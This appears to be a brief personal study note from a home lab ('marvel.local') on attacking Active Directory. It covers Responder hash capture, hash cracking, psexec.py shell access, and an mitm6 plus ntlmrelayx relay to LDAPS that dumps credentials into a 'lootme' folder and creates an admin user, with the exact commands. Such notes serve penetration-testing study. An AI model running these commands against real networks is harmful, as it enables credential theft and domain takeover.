Attack Vectors

The following method requires user interaction (like from RDP session)

  1. Run a responder.py to listen to activities.

  2. obtain hashes and crack them

  3. gain a shell via psexec.py

  • syntax -> psexec.py DOMAIN.local/username:PASSWORD@IP_ADDRESS

Attacking LDAP Secure with mitm6!

  1. Download mitm6 and pip3 . it

  2. Set up Ldaps on Windows server

  • server -> manage -> add roles and features -> add active directory certificates -> configure ADCS (restart option enabled) -> click CA -> restart the machine

3. python3 mimt6.py -d marvel.local (in opt folder) -> this starts listening for connections

4. ntlmrelayx.py -6 -t ldaps://DOMAINCONTROLLER_IP -wh fakewpad.marvel.local -l lootme

5. User restarts a computer -> all the creds will be stored in a folder called "lootme"

If you look at it on firefox, you can see all kinds of secrets!

Once user logins as admin, it creates a new user with admin priv .

Last updated